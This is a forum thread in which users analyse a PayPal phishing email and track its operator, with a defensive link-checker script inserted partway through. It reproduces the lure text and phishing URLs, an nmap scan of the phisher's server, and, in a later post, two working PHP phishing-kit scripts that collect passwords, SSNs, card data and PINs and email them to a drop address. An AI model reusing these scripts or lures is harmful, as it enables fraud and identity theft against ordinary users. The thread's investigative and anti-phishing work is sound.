Majest|c

So I check Gmail today

27 posts in this topic

Update Your Information

It has come to our attention that your PayPal account has been accessed by a third party, meaning that an unauthorized person has logged into your account.

We require that you log-in to your account and update your billing information and security questions, so that further third party access can be prevented.

Failure to update your billing information and security questions before March 20th may result in suspension of your account.

To proceed in updating your billing information and security questions, please click on the following link:


https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-update&login_access=1142486462

That link actually pointed to:
http://70.29.183.56/vti_bin/webscr/acc.upgrade=security/PayPal/index.html

And 70.29.183.56 =

Rogers Cable Inc. ROGERS-CAB-8 (NET-70-24-0-0-1)
70.24.0.0 - 70.31.255.255
Rogers Cable Inc. Wlfdle DOC-3-6-0-2-WLFDLE-2 (NET-70-29-183-0-1)
70.29.183.0 - 70.29.183.255

Updating your billing information and security questions will prevent unauthorized third party access, and possibly unauthorized purchases. We thank you for your participation in updating your account.

Sincerely,

The PayPal Tea

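A defender-side check for what the first post shows (a visible paypal.com URL whose real href is a bare-IP host), added here as an example and not part of the original thread. The sample HTML is constructed to mirror that mail; the function names are my own.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import ipaddress

# Constructed sample mirroring the mail above: the displayed text is a paypal.com
# URL, the real href is the bare Rogers Cable IP. The second anchor is benign.
SAMPLE_HTML = (
    '<a href="http://70.29.183.56/vti_bin/webscr/acc.upgrade=security/PayPal/index.html">'
    'https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-update&amp;login_access=1142486462</a>'
    '<a href="https://www.paypal.com/help">Help Center</a>'
)

def _host(url):
    return (urlparse(url.strip()).hostname or "").lower()

def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

class _Anchors(HTMLParser):
    """Collect (href, visible text) for every <a> in the message body."""
    def __init__(self):
        super().__init__()
        self.found, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = (dict(attrs).get("href") or ""), []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.found.append((self._href, "".join(self._text).strip()))
            self._href = None

def suspicious_links(html):
    """Return (href, text, reason) for links a reader is likely to misjudge."""
    parser = _Anchors()
    parser.feed(html)
    findings = []
    for href, text in parser.found:
        real = _host(href)
        # Only compare hosts when the visible text itself looks like a URL.
        shown = _host(text) if text.lower().startswith(("http://", "https://")) else ""
        if shown and shown != real:
            findings.append((href, text, f"shown host {shown} differs from link host {real}"))
        elif _is_ip(real):
            findings.append((href, text, "link host is a bare IP address"))
    return findings
```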
I might be wrong, but it looks like a hoax, a scam, a phish. :)

Just delete it and, if you want, report it.

Agreed. Link, then pointed link? What's the point of that? Also, the sense it's written in doesn't seem professional...

Edited by PFI
Hey Majestic, et al,

I work for an InfoSec company specializing in phishing, if you guys get these phish could you pm me them with the headers? Odds are pretty good we're already tracking this group, the more forensic evidence, the better.

Hey Majestic, et al,

I work for an InfoSec company specializing in phishing, if you guys get these phish could you pm me them with the headers? Odds are pretty good we're already tracking this group, the more forensic evidence, the better.

I'm tracking phishers too -- lots of them hang out on irc.darkunix.net.

Used to bust them via egold.

Hey Majestic, et al,

I work for an InfoSec company specializing in phishing, if you guys get these phish could you pm me them with the headers? Odds are pretty good we're already tracking this group, the more forensic evidence, the better.

I'm tracking phishers too -- lots of them hang out on irc.darkunix.net.

Used to bust them via egold.

I already have a thing with PayPal, so right now I am not going to release a lot of the info. If and when something happens, you will prolly read about it, or I will give you some info!

Well, if you want to bring in the big guns for resources, drop us a line

sendmephish a t securescience.net

JB

Edited by stonersavant
Drop me a line too if you like,

just PM me.

Phishing is our bread and butter, if you'd like my credentials talk to natas, lucky, or Strom :)

Damn, that's sad, lol. I'm using the same ISP as that phisher, one of the largest in Ontario, if not Canada, along with Bell Canada.

Found http://70.29.183.56/vti_bin/webscr1/account.upgrade/pp0x.zip

Sad that they can't even phish properly by locking directories.

Good work. According to the scam kit, the drop is at http://70.29.183.56/vti_bin/webscr1/accoun...Pay/pp03948.txt

Interesting 404 message, too.

eBay Client Update Server

Here's nmap:

Interesting ports on CPE123456789cdf-CM001310268b24.cpe.net.cable.rogers.com (70.29.183.56):
(The 1653 ports scanned but not shown below are in state: filtered)
PORT      STATE  SERVICE             VERSION
21/tcp    open   ftp                 WU-FTPD 6.00LS
22/tcp    open   ssh                 OpenSSH 4.2p1 FreeBSD-20050903 (protocol 2.0)
80/tcp    open   http                Apache httpd 1.3.34 ((Unix) PHP/4.4.1)
Device type: general purpose
Running: FreeBSD 5.X
OS details: FreeBSD 5.2-CURRENT (Jan 2004) on x86, FreeBSD 5.2.1 (SPARC)
Uptime 6.455 days (since Mon Mar 13 07:38:20 2006)

# Nmap run completed at Sun Mar 19 18:32:59 2006 -- 1 IP address (1 host up) scanned in 39.127 seconds

Info emailed to chinioti@gmail.com

A quick Google search of this email address brings us to

http://72.14.203.104/search?q=cache:Cde7wa...lient=firefox-a

and it looks like this character is a Pakistani (probably about 15 years old, in my opinion, from his 'Net ramblings) who is part of a hacking group called Whackerz Pakistan (have as much fun with that name as you see fit :-)) that has been very busy defacing Western websites in the name of Islam after the whole Danish cartoon affair.

We see an example of their politically charged defacings here:

http://www.yourmother.com/18/index.php3

And another, claiming affiliation with DigitalMind:

http://renfah.sonance.net/0rf/0sterreich/

And another at

http://www.lockload.com.au/jobs/

Advertising #digitalmind on dalnet, which was vacant when I visited it.

Another attack by this same group is found at

http://www.satorimedia.com/hands_on/

which shows a defacement of a different style, but for the same group. Another email address is listed, threepingplug@yahoo.com, and another irc chan/net: irc.gigachat.net #Whackerz

Here's the zone-h site for them:

http://www.zone-h.org/defacements/filter/f...efacer=WHACKERZ

Edited by stonersavant
Ok, so today I received yet another email. I was surprised this time because I never really found any useful code until today. The scam is Here. Doing a little directory browsing, you will find chase.tar.gz, which has the PHP scripts.

Perhaps we can start a phishing section or thread as a project?

logon.php



<?
$ip = getenv("REMOTE_ADDR");
$usr_name = $HTTP_POST_VARS['usr_name'];
$usr_password = $HTTP_POST_VARS['usr_password'];
$msg="
Ip: $ip
User: $usr_name
Pass: $usr_password
";
mail("epassro@yahoo.com" , "Loginu", $msg);
header("location: account.html?https//chaseonline.chase.com/colappmgr/colportal/customer_nfpb=true&_pageLabel=page_myaccounts");
?>

update.php



<?
$ip = getenv("REMOTE_ADDR");
$FirstName = $HTTP_POST_VARS['FirstName'];
$LastName = $HTTP_POST_VARS['LastName'];
$SSN1 = $HTTP_POST_VARS['SSN1'];
$SSN2 = $HTTP_POST_VARS['SSN2'];
$SSN3 = $HTTP_POST_VARS['SSN3'];
$AccNum = $HTTP_POST_VARS['AccNum'];
$Email = $HTTP_POST_VARS['Email'];
$CC = $HTTP_POST_VARS['CC'];
$bl_cc_expyear = $HTTP_POST_VARS['bl_cc_expyear'];
$bl_cc_expmonth = $HTTP_POST_VARS['bl_cc_expmonth'];
$Cvv = $HTTP_POST_VARS['Cvv'];
$Pin = $HTTP_POST_VARS['Pin'];
$msg="
Ip: $ip
First Name: $FirstName
Last Name: $LastName
SSN: $SSN1/$SSN2/$SSN3
Account Number: $AccNum
Email: $Email
Cartea: $CC
Year: $bl_cc_expyear
Month: $bl_cc_expmonth
Cvv: $Cvv
Pin: $Pin
";
mail("epassro@yahoo.com", "Manhattan", $msg);
header("Location: http://www.chase.com");
?>

Someone should set up an ethical phishing scheme. As soon as someone clicks on the field to enter their CC number, a box would pop up:

STOP! You could have just been scammed. [go on explaining phishing and how to avoid it]

I would highly recommend this book if you want to know the background of phishing. It is a bit heavy (as in not a simple read), and if you can get it from your library, even better. I have no affiliation to Mr James, but then neither do I to Shakespeare :D

There is a great online test for phishing from Mailfrontier that is an eye opener for those who actually believe there is a Santa. :devil:

Edited by mickeyporkpies
great links, thanks. I'll check out the ebook, but I never find time to read on the computer.

Edit by Natas: No w4r3z.

Edited by natas
Here's the eBook if anyone wants it.

You do know that Lance reads/is a friend of binrev, right?

this book I have no affiliation to Mr James but then neither do I to Shakespeare :D

I do, he's my boss.

MCP, would you please remove the link for the ebook, as a favor?

[edit: Lance and I thank you!!]

Edited by stonersavant
Phishers beware:



Delivery to the following recipient failed permanently:

   update@paypalservice.com

Technical details of permanent failure:
TEMP_FAILURE: Could not initiate SMTP conversation with any hosts:
[paypalservice.com (1): Connection timed out]

I will overcome :grr:

Hey Majestic, et al,

I work for an InfoSec company specializing in phishing, if you guys get these phish could you pm me them with the headers? Odds are pretty good we're already tracking this group, the more forensic evidence, the better.

I'm wondering if you're interested in those African money transfer schemes too. I just got one after a long time of not seeing one. It even has the nerve to start off apologizing for the unsolicited email. If you're looking for that type of thing, PM or email me and let me know.

I'm wondering if you're interested in those African money transfer schemes too. I just got one after a long time of not seeing one. It even has the nerve to start off apologizing for the unsolicited email. If you're looking for that type of thing, PM or email me and let me know.

I do some sc@m b a | t i //\\// g once in a while...check out 419eater.org
